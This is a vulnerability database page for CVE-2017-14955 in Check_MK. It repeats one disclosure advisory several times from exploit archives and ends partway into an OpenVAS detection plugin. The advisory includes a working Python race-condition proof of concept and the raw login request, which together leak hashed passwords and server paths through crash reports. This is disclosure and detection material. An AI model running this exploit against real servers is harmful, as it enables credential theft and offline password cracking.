ID CVE-2017-14955 Type cve Reporter cve@mitre.org Modified 2019-10-17T13:21:00
Description
Check_MK before 1.2.8p26 mishandles certain errors within the failed-login save feature because of a race condition, which allows remote attackers to obtain sensitive user information by reading a GUI crash report.
{"zdt": [{"lastseen": "2018-01-03T07:02:18", "description": "Exploit for python platform in category web applications", "edition": 1, "published": "2017-10-21T00:00:00", "type": "zdt", "title": "Check_MK 1.2.8p25 - Information Disclosure Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-21T00:00:00", "href": "https://0day.today/exploit/description/28829", "id": "1337DAY-ID-28829", "sourceData": "1. ADVISORY INFORMATION\r\n=======================\r\nProduct: Check_mk\r\nVendor URL: https://mathias-kettner.de/check_mk.html\r\nType: Race Condition [CWE-362]\r\nDate found: 2017-09-21\r\nDate published: 2017-10-18\r\nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\r\nCVE: CVE-2017-14955\r\n \r\n \r\n2. CREDITS\r\n==========\r\nThis vulnerability was discovered and researched by Julien Ahrens from\r\nRCE Security.\r\n \r\n \r\n3. VERSIONS AFFECTED\r\n====================\r\nCheck_mk v1.2.8p25\r\nCheck_mk v1.2.8p25 Enterprise\r\nolder versions may be affected too.\r\n \r\n \r\n4. INTRODUCTION\r\n===============\r\nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios.\r\nCheck_MK is available as Raw Edition, which is 100% pure open source, and as\r\nEnterprise Edition with a lot of additional features and professional support.\r\n \r\n(from the vendor's homepage)\r\n \r\n \r\n5. VULNERABILITY DETAILS\r\n========================\r\nCheck_mk is vulnerable to an unauthenticated information disclosure through a\r\nrace condition during the authentication process when trying to authenticate\r\nwith a valid username and an invalid password.\r\n \r\nOn a failed login, the application calls the function save_users(), which\r\nperforms two os.rename operations on the files \"contacts.mk.new\" and\r\n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):\r\n \r\n[..]\r\n # Check_MK's monitoring contacts\r\n filename = root_dir + \"contacts.mk.new\"\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n \r\n # Users with passwords for Multisite\r\n filename = multisite_dir + \"users.mk.new\"\r\n make_nagios_directory(multisite_dir)\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n[...]\r\n \r\nWhen sending many concurrent authentication requests with an existing/valid\r\nusername, such as:\r\n \r\nPOST /check_mk/login.py HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---9519178121294961341040589727\r\nContent-Length: 772\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"filled_in\"\r\n \r\nlogin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n \r\n1\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_origtarget\"\r\n \r\nindex.py\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_username\"\r\n \r\nomdadmin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_password\"\r\n \r\nwelcome\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n \r\nLogin\r\n---9519178121294961341040589727--\r\n \r\nThen it could happen that one of both os.rename() calls references a non-\r\nexisting file, which has just been renamed by a previous thread. This causes the\r\nPython script to fail and throw a crash report, which discloses a variety of\r\nsensitive information, such as internal server paths, account details including\r\nhashed passwords:\r\n \r\n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',\r\n 'contactgroups': ['all'],\r\n 'disable_notifications': False,\r\n 'email': u'[email\u00a0protected]',\r\n 'enforce_pw_change': False,\r\n 'last_pw_change': 0,\r\n 'last_seen': 0.0,\r\n 'locked': False,\r\n 'num_failed': 0,\r\n 'pager': '',\r\n 'password': '$1$400000$13371337asdfasdf',\r\n 'roles': ['admin'],\r\n 'serial': 2},\r\n \r\nA script to automatically exploit this vulnerability can be found on [0].\r\n \r\n6. POC\r\n======\r\n \r\n#!/usr/bin/python\r\n# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition\r\n# Version: <=3D 1.2.8p25\r\n# Date: 2017-10-18\r\n# Author: Julien Ahrens (@MrTuxracer)\r\n# Homepage: https://www.rcesecurity.com\r\n# Software Link: https://mathias-kettner.de/check_mk.html\r\n# Tested on: 1.2.8p25\r\n# CVE:=09=09 CVE-2017-14955\r\n#\r\n# Howto / Notes:\r\n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and\r\n# below as described by CVE-2017-14955. You only need a valid username to\r\n# dump all encrypted passwords and make sure to setup a local proxy to\r\n# catch the dump. Happy brute forcing ;-)\r\n \r\nimport requests\r\nimport threading\r\n \r\ntry:\r\n=09from requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nexcept:\r\n=09pass\r\n \r\n# Config Me\r\ntarget_url =3D \"https://localhost/check_mk/login.py\"\r\ntarget_username =3D \"omdadmin\"\r\n \r\nproxies =3D {\r\n 'http': 'http://127.0.0.1:8080',\r\n 'https': 'http://127.0.0.1:8080',\r\n}\r\n \r\ndef make_session():\r\n=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=\r\n=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=\r\nne, 'index.py'), '_username': (None, target_username), '_password': (None, =\r\n'random'), '_login': (None, 'Login')})\r\n=09return v.content\r\n \r\nNUM =3D 50\r\n \r\nthreads =3D []\r\nfor i in range(NUM):\r\n t =3D threading.Thread(target=3Dmake_session)\r\n threads.append(t)\r\n t.start()\r\n \r\n7. RISK\r\n=======\r\nTo successfully exploit this vulnerability an unauthenticated attacker must only\r\nhave network-level access to the application.\r\n \r\nThe vulnerability allows remote attackers to trigger an exception, which\r\ndiscloses a variety of sensitive internal information such as:\r\n- Local server paths\r\n- Usernames\r\n- Passwords (hashed)\r\n- and user directory-specific attributes (i.e. LDAP)\r\n \r\n \r\n8. SOLUTION\r\n===========\r\nUpdate to 1.2.8p26.\r\n \r\n \r\n9. REPORT TIMELINE\r\n==================\r\n2017-09-21: Discovery of the vulnerability\r\n2017-09-21: Sent limited information to publicly listed email address\r\n2017-09-21: Vendor responds and asks for details\r\n2017-09-21: Full vulnerability details sent to vendor\r\n2017-09-25: Vendor pushes fix to git\r\n2017-10-01: MITRE assigns CVE-2017-14955\r\n2017-10-16: Fix confirmed\r\n2017-10-18: Public disclosure\r\n \r\n \r\n10. REFERENCES\r\n=============\r\n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\r\n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/28829", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2017-10-21T22:05:38", "description": "", "published": "2017-10-19T00:00:00", "type": "packetstorm", "title": "Check_mk 1.2.8p25 save_users() Race Condition", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-19T00:00:00", "id": "PACKETSTORM:144689", "href": "https://packetstormsecurity.com/files/144689/Check_mk-1.2.8p25-save_users-Race-Condition.html", "sourceData": "`RCE Security Advisory \nhttps://www.rcesecurity.com \n \n \n1. ADVISORY INFORMATION \n======================= \nProduct: Check_mk \nVendor URL: https://mathias-kettner.de/check_mk.html \nType: Race Condition [CWE-362] \nDate found: 2017-09-21 \nDate published: 2017-10-18 \nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \nCVE: CVE-2017-14955 \n \n \n2. CREDITS \n========== \nThis vulnerability was discovered and researched by Julien Ahrens from \nRCE Security. \n \n \n3. VERSIONS AFFECTED \n==================== \nCheck_mk v1.2.8p25 \nCheck_mk v1.2.8p25 Enterprise \nolder versions may be affected too. \n \n \n4. INTRODUCTION \n=============== \nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios. \nCheck_MK is available as Raw Edition, which is 100% pure open source, and as \nEnterprise Edition with a lot of additional features and professional support. \n \n(from the vendor's homepage) \n \n \n5. VULNERABILITY DETAILS \n======================== \nCheck_mk is vulnerable to an unauthenticated information disclosure through a \nrace condition during the authentication process when trying to authenticate \nwith a valid username and an invalid password. \n \nOn a failed login, the application calls the function save_users(), which \nperforms two os.rename operations on the files \"contacts.mk.new\" and \n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py): \n \n[..] \n# Check_MK's monitoring contacts \nfilename = root_dir + \"contacts.mk.new\" \nout = create_user_file(filename, \"w\") \nout.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\") \nout.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts)) \nout.close() \nos.rename(filename, filename[:-4]) \n \n# Users with passwords for Multisite \nfilename = multisite_dir + \"users.mk.new\" \nmake_nagios_directory(multisite_dir) \nout = create_user_file(filename, \"w\") \nout.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\") \nout.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users)) \nout.close() \nos.rename(filename, filename[:-4]) \n[...] \n \nWhen sending many concurrent authentication requests with an existing/valid \nusername, such as: \n \nPOST /check_mk/login.py HTTP/1.1 \nHost: localhost \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: multipart/form-data; boundary=---9519178121294961341040589727 \nContent-Length: 772 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"filled_in\" \n \nlogin \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_login\" \n \n1 \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_origtarget\" \n \nindex.py \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_username\" \n \nomdadmin \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_password\" \n \nwelcome \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_login\" \n \nLogin \n---9519178121294961341040589727-- \n \nThen it could happen that one of both os.rename() calls references a non- \nexisting file, which has just been renamed by a previous thread. This causes the \nPython script to fail and throw a crash report, which discloses a variety of \nsensitive information, such as internal server paths, account details including \nhashed passwords: \n \n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator', \n'contactgroups': ['all'], \n'disable_notifications': False, \n'email': u'admin@example.com', \n'enforce_pw_change': False, \n'last_pw_change': 0, \n'last_seen': 0.0, \n'locked': False, \n'num_failed': 0, \n'pager': '', \n'password': '$1$400000$13371337asdfasdf', \n'roles': ['admin'], \n'serial': 2}, \n \nA script to automatically exploit this vulnerability can be found on [0]. \n \n6. RISK \n======= \nTo successfully exploit this vulnerability an unauthenticated attacker must only \nhave network-level access to the application. \n \nThe vulnerability allows remote attackers to trigger an exception, which \ndiscloses a variety of sensitive internal information such as: \n- Local server paths \n- Usernames \n- Passwords (hashed) \n- and user directory-specific attributes (i.e. LDAP) \n \n \n7. SOLUTION \n=========== \nUpdate to 1.2.8p26. \n \n \n8. REPORT TIMELINE \n================== \n2017-09-21: Discovery of the vulnerability \n2017-09-21: Sent limited information to publicly listed email address \n2017-09-21: Vendor responds and asks for details \n2017-09-21: Full vulnerability details sent to vendor \n2017-09-25: Vendor pushes fix to git \n2017-10-01: MITRE assigns CVE-2017-14955 \n2017-10-16: Fix confirmed \n2017-10-18: Public disclosure \n \n \n9. REFERENCES \n============= \n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/ \n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 \n \n \nProof of concept: \n \n#!/usr/bin/python \n# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition \n# Version: <= 1.2.8p25 \n# Date: 2017-10-18 \n# Author: Julien Ahrens (@MrTuxracer) \n# Homepage: https://www.rcesecurity.com \n# Software Link: https://mathias-kettner.de/check_mk.html \n# Tested on: 1.2.8p25 \n# CVE: CVE-2017-14955 \n# \n# Howto / Notes: \n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and \n# below as described by CVE-2017-14955. You only need a valid username to \n# dump all encrypted passwords and make sure to setup a local proxy to \n# catch the dump. Happy brute forcing ;-) \n \nimport requests \nimport threading \n \ntry: \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nexcept: \npass \n \n# Config Me \ntarget_url = \"https://localhost/check_mk/login.py\" \ntarget_username = \"omdadmin\" \n \nproxies = { \n'http': 'http://127.0.0.1:8080', \n'https': 'http://127.0.0.1:8080', \n} \n \ndef make_session(): \nv = requests.post(target_url, verify=False, proxies=proxies, files={'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (None, 'index.py'), '_username': (None, target_username), '_password': (None, 'random'), '_login': (None, 'Login')}) \nreturn v.content \n \nNUM = 50 \n \nthreads = [] \nfor i in range(NUM): \nt = threading.Thread(target=make_session) \nthreads.append(t) \nt.start() \n \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144689/RCESEC-2017-001.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:08", "description": "\nCheck_MK 1.2.8p25 - Information Disclosure", "edition": 1, "published": "2017-10-18T00:00:00", "title": "Check_MK 1.2.8p25 - Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-18T00:00:00", "id": "EXPLOITPACK:EA6FD12848ADC6DC8FF41880397BDBC2", "href": "", "sourceData": "1. ADVISORY INFORMATION\n=======================\nProduct: Check_mk\nVendor URL: https://mathias-kettner.de/check_mk.html\nType: Race Condition [CWE-362]\nDate found: 2017-09-21\nDate published: 2017-10-18\nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\nCVE: CVE-2017-14955\n\n\n2. CREDITS\n==========\nThis vulnerability was discovered and researched by Julien Ahrens from\nRCE Security.\n\n\n3. VERSIONS AFFECTED\n====================\nCheck_mk v1.2.8p25\nCheck_mk v1.2.8p25 Enterprise\nolder versions may be affected too.\n\n\n4. INTRODUCTION\n===============\nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios.\nCheck_MK is available as Raw Edition, which is 100% pure open source, and as\nEnterprise Edition with a lot of additional features and professional support.\n\n(from the vendor's homepage)\n\n\n5. VULNERABILITY DETAILS\n========================\nCheck_mk is vulnerable to an unauthenticated information disclosure through a\nrace condition during the authentication process when trying to authenticate\nwith a valid username and an invalid password.\n\nOn a failed login, the application calls the function save_users(), which\nperforms two os.rename operations on the files \"contacts.mk.new\" and\n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):\n\n[..]\n # Check_MK's monitoring contacts\n filename = root_dir + \"contacts.mk.new\"\n out = create_user_file(filename, \"w\")\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\n out.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts))\n out.close()\n os.rename(filename, filename[:-4])\n\n # Users with passwords for Multisite\n filename = multisite_dir + \"users.mk.new\"\n make_nagios_directory(multisite_dir)\n out = create_user_file(filename, \"w\")\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\n out.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users))\n out.close()\n os.rename(filename, filename[:-4])\n[...]\n\nWhen sending many concurrent authentication requests with an existing/valid\nusername, such as:\n\nPOST /check_mk/login.py HTTP/1.1\nHost: localhost\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---9519178121294961341040589727\nContent-Length: 772\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"filled_in\"\n\nlogin\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_login\"\n\n1\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_origtarget\"\n\nindex.py\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_username\"\n\nomdadmin\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_password\"\n\nwelcome\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_login\"\n\nLogin\n---9519178121294961341040589727--\n\nThen it could happen that one of both os.rename() calls references a non-\nexisting file, which has just been renamed by a previous thread. This causes the\nPython script to fail and throw a crash report, which discloses a variety of\nsensitive information, such as internal server paths, account details including\nhashed passwords:\n\n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',\n 'contactgroups': ['all'],\n 'disable_notifications': False,\n 'email': u'admin@example.com',\n 'enforce_pw_change': False,\n 'last_pw_change': 0,\n 'last_seen': 0.0,\n 'locked': False,\n 'num_failed': 0,\n 'pager': '',\n 'password': '$1$400000$13371337asdfasdf',\n 'roles': ['admin'],\n 'serial': 2},\n\nA script to automatically exploit this vulnerability can be found on [0].\n\n6. POC\n======\n\n#!/usr/bin/python\n# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition\n# Version: <=3D 1.2.8p25\n# Date: 2017-10-18\n# Author: Julien Ahrens (@MrTuxracer)\n# Homepage: https://www.rcesecurity.com\n# Software Link: https://mathias-kettner.de/check_mk.html\n# Tested on: 1.2.8p25\n# CVE:=09=09 CVE-2017-14955\n#\n# Howto / Notes:\n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and\n# below as described by CVE-2017-14955. You only need a valid username to\n# dump all encrypted passwords and make sure to setup a local proxy to\n# catch the dump. Happy brute forcing ;-)\n\nimport requests\nimport threading\n\ntry:\n=09from requests.packages.urllib3.exceptions import InsecureRequestWarning\n=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nexcept:\n=09pass\n\n# Config Me\ntarget_url =3D \"https://localhost/check_mk/login.py\"\ntarget_username =3D \"omdadmin\"\n\nproxies =3D {\n 'http': 'http://127.0.0.1:8080',\n 'https': 'http://127.0.0.1:8080',\n}\n\ndef make_session():\n=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=\n=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=\nne, 'index.py'), '_username': (None, target_username), '_password': (None, =\n'random'), '_login': (None, 'Login')})\n=09return v.content\n\nNUM =3D 50\n\nthreads =3D []\nfor i in range(NUM):\n t =3D threading.Thread(target=3Dmake_session)\n threads.append(t)\n t.start()\n\n7. RISK\n=======\nTo successfully exploit this vulnerability an unauthenticated attacker must only\nhave network-level access to the application.\n\nThe vulnerability allows remote attackers to trigger an exception, which\ndiscloses a variety of sensitive internal information such as:\n- Local server paths\n- Usernames\n- Passwords (hashed)\n- and user directory-specific attributes (i.e. LDAP)\n\n\n8. SOLUTION\n===========\nUpdate to 1.2.8p26.\n\n\n9. REPORT TIMELINE\n==================\n2017-09-21: Discovery of the vulnerability\n2017-09-21: Sent limited information to publicly listed email address\n2017-09-21: Vendor responds and asks for details\n2017-09-21: Full vulnerability details sent to vendor\n2017-09-25: Vendor pushes fix to git\n2017-10-01: MITRE assigns CVE-2017-14955\n2017-10-16: Fix confirmed\n2017-10-18: Public disclosure\n\n\n10. REFERENCES\n=============\n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2017-10-20T18:30:43", "description": "Check_MK 1.2.8p25 - Information Disclosure. CVE-2017-14955. Webapps exploit for Python platform", "published": "2017-10-18T00:00:00", "type": "exploitdb", "title": "Check_MK 1.2.8p25 - Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-18T00:00:00", "id": "EDB-ID:43021", "href": "https://www.exploit-db.com/exploits/43021/", "sourceData": "1. ADVISORY INFORMATION\r\n=======================\r\nProduct: Check_mk\r\nVendor URL: https://mathias-kettner.de/check_mk.html\r\nType: Race Condition [CWE-362]\r\nDate found: 2017-09-21\r\nDate published: 2017-10-18\r\nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\r\nCVE: CVE-2017-14955\r\n\r\n\r\n2. CREDITS\r\n==========\r\nThis vulnerability was discovered and researched by Julien Ahrens from\r\nRCE Security.\r\n\r\n\r\n3. VERSIONS AFFECTED\r\n====================\r\nCheck_mk v1.2.8p25\r\nCheck_mk v1.2.8p25 Enterprise\r\nolder versions may be affected too.\r\n\r\n\r\n4. INTRODUCTION\r\n===============\r\nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios.\r\nCheck_MK is available as Raw Edition, which is 100% pure open source, and as\r\nEnterprise Edition with a lot of additional features and professional support.\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\n5. VULNERABILITY DETAILS\r\n========================\r\nCheck_mk is vulnerable to an unauthenticated information disclosure through a\r\nrace condition during the authentication process when trying to authenticate\r\nwith a valid username and an invalid password.\r\n\r\nOn a failed login, the application calls the function save_users(), which\r\nperforms two os.rename operations on the files \"contacts.mk.new\" and\r\n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):\r\n\r\n[..]\r\n # Check_MK's monitoring contacts\r\n filename = root_dir + \"contacts.mk.new\"\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n\r\n # Users with passwords for Multisite\r\n filename = multisite_dir + \"users.mk.new\"\r\n make_nagios_directory(multisite_dir)\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n[...]\r\n\r\nWhen sending many concurrent authentication requests with an existing/valid\r\nusername, such as:\r\n\r\nPOST /check_mk/login.py HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---9519178121294961341040589727\r\nContent-Length: 772\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"filled_in\"\r\n\r\nlogin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n\r\n1\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_origtarget\"\r\n\r\nindex.py\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_username\"\r\n\r\nomdadmin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_password\"\r\n\r\nwelcome\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n\r\nLogin\r\n---9519178121294961341040589727--\r\n\r\nThen it could happen that one of both os.rename() calls references a non-\r\nexisting file, which has just been renamed by a previous thread. This causes the\r\nPython script to fail and throw a crash report, which discloses a variety of\r\nsensitive information, such as internal server paths, account details including\r\nhashed passwords:\r\n\r\n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',\r\n 'contactgroups': ['all'],\r\n 'disable_notifications': False,\r\n 'email': u'admin@example.com',\r\n 'enforce_pw_change': False,\r\n 'last_pw_change': 0,\r\n 'last_seen': 0.0,\r\n 'locked': False,\r\n 'num_failed': 0,\r\n 'pager': '',\r\n 'password': '$1$400000$13371337asdfasdf',\r\n 'roles': ['admin'],\r\n 'serial': 2},\r\n\r\nA script to automatically exploit this vulnerability can be found on [0].\r\n\r\n6. POC\r\n======\r\n\r\n#!/usr/bin/python\r\n# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition\r\n# Version: <=3D 1.2.8p25\r\n# Date: 2017-10-18\r\n# Author: Julien Ahrens (@MrTuxracer)\r\n# Homepage: https://www.rcesecurity.com\r\n# Software Link: https://mathias-kettner.de/check_mk.html\r\n# Tested on: 1.2.8p25\r\n# CVE:=09=09 CVE-2017-14955\r\n#\r\n# Howto / Notes:\r\n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and\r\n# below as described by CVE-2017-14955. You only need a valid username to\r\n# dump all encrypted passwords and make sure to setup a local proxy to\r\n# catch the dump. Happy brute forcing ;-)\r\n\r\nimport requests\r\nimport threading\r\n\r\ntry:\r\n=09from requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nexcept:\r\n=09pass\r\n\r\n# Config Me\r\ntarget_url =3D \"https://localhost/check_mk/login.py\"\r\ntarget_username =3D \"omdadmin\"\r\n\r\nproxies =3D {\r\n 'http': 'http://127.0.0.1:8080',\r\n 'https': 'http://127.0.0.1:8080',\r\n}\r\n\r\ndef make_session():\r\n=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=\r\n=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=\r\nne, 'index.py'), '_username': (None, target_username), '_password': (None, =\r\n'random'), '_login': (None, 'Login')})\r\n=09return v.content\r\n\r\nNUM =3D 50\r\n\r\nthreads =3D []\r\nfor i in range(NUM):\r\n t =3D threading.Thread(target=3Dmake_session)\r\n threads.append(t)\r\n t.start()\r\n\r\n7. RISK\r\n=======\r\nTo successfully exploit this vulnerability an unauthenticated attacker must only\r\nhave network-level access to the application.\r\n\r\nThe vulnerability allows remote attackers to trigger an exception, which\r\ndiscloses a variety of sensitive internal information such as:\r\n- Local server paths\r\n- Usernames\r\n- Passwords (hashed)\r\n- and user directory-specific attributes (i.e. LDAP)\r\n\r\n\r\n8. SOLUTION\r\n===========\r\nUpdate to 1.2.8p26.\r\n\r\n\r\n9. REPORT TIMELINE\r\n==================\r\n2017-09-21: Discovery of the vulnerability\r\n2017-09-21: Sent limited information to publicly listed email address\r\n2017-09-21: Vendor responds and asks for details\r\n2017-09-21: Full vulnerability details sent to vendor\r\n2017-09-25: Vendor pushes fix to git\r\n2017-10-01: MITRE assigns CVE-2017-14955\r\n2017-10-16: Fix confirmed\r\n2017-10-18: Public disclosure\r\n\r\n\r\n10. REFERENCES\r\n=============\r\n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\r\n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955\r\n\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/43021/"}], "openvas": [{"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955"], "description": "Check_MK is prone to a race condition vulnerability which could lead to\ninformation disclosure.", "modified": "2018-10-26T00:00:00", "published": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310140449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140449", "type": "openvas", "title": "Check_MK Information Disclosure Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_check_mk_info_disc_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Check_MK Information Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, 